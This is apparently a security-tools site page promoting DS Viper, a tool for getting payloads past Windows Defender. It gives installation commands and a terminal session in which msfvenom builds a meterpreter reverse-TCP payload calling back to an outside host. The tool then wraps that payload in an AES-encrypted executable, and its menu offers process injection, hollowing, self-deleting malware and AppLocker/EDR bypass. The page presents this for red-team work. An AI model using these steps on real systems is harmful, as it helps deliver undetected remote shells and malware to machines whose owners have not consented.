Offensive Security Tool: DS Viper
DS Viper
DS Viper, developed by dagowda and Sumanthsec, is a tool designed to bypass Windows Defender’s security mechanisms, enabling seamless execution of payloads on Windows systems without triggering security alerts. It utilizes a combination of advanced techniques to manipulate and disguise payloads, providing cybersecurity professionals, red teamers, and penetration testers with a robust solution for achieving undetected access.
Whether you’re simulating real-world attacks or conducting comprehensive security audits, DS Viper serves as an essential tool for testing and improving system defenses.
See Also: A Practical Guide to Hacking Techniques for finding Top Bugs.
The Bug Bounty Hunting Course
Installation
Clone the repository and set up the environment.
Option 1: Manual Installation
git clone https://github.com/dagowda/DSViper.git cd DSViper pip install -r requirements.txt sudo apt-get update sudo apt-get install -y mingw-w64 sudo apt install mono-complete mkdir masm wget -O masm/uasm_linux64.zip https://www.terraspace.co.uk/uasm257_linux64.zip unzip masm/uasm_linux64.zip -d masm chmod +x masm/uasm* sudo cp masm/uasm /usr/bin/uasm
Option 2: Scripted Installation (Recommended)
If you prefer an automated setup, use the provided script:
chmod +x install_dependencies.sh
./install_dependencies.sh
See Also: Recon Tool: Argus
Usage
Make the DSViper binary executable and run it OR just run the python script using python3:
➜ DSViper git:(main) ✗ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.130.175 LPORT=443 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201798 bytes
➜ DSViper git:(main) ✗ python3 DSViper.py
░▒▓███████▓▒░ ░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
................................................
AntiVirus Bypass Tool (v.0.2.1)
---------------------------------------------------------
Created by Dhanush Gowda(dagowda) and Sumanth Vankineni
---------------------------------------------------------
................................................
You sure you want to Continue?(Use it ethically, and in lab enviroments only) y/n: y
Enter your payload choice:
1.)self-injection(XOR)
2.)self-injection(AES)
3.)Process Injection(spoolsv)(Can be used for lateral movement)
4.)Process Hollow
5.)Self Deleting Malware(HAVE TO WAIT, CLOSE TO A MINUTE FOR THE PAYLOAD TO EXECUTE)
6.)DLL side-load/rundll32 applocker bypass
7.)Process Injection(explorer.exe)
8.)Powershell(Will bypass with cloud detections enabled as well)(Make sure to run this payload twice)(use x64 payload only)
9.)Applocker bypass small shellcodes(Make sure to use x86 payloads)(Also make sure to change the .exe file name after everyrun on the same victim)(Make sure you run this payload twice)
10.)Applocker bypass Havoc/large shellcodes(use x86 payloads only)
11.)Indirect Syscall(Windows 10)(Possible EDR bypass loader)
>2
Please type in the shellcode file name: payload.bin
Selected self-injection(AES)
[*]Payload successfully created as DSViper_AES.exeNotes
- Ensure you have Python 3.8+ installed.
- Run the commands in a terminal with the required permissions.
Clone the repo from here: GitHub Link
Recent Tools
Offensive Security Tool: Bxss – Blind XSS Scanner
Blind XSS Scanner is a tool that can be used …Vulnerability Management Tool: CVE Prioritizer
CVE Prioritizer is a vulnerability management tool designed to help …Offensive Security Tool: HExHTTP
HExHTTP is a tool designed to perform tests on HTTP …Recon Tool: getJS
getJS is a tool designed for extracting JavaScript sources from …
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
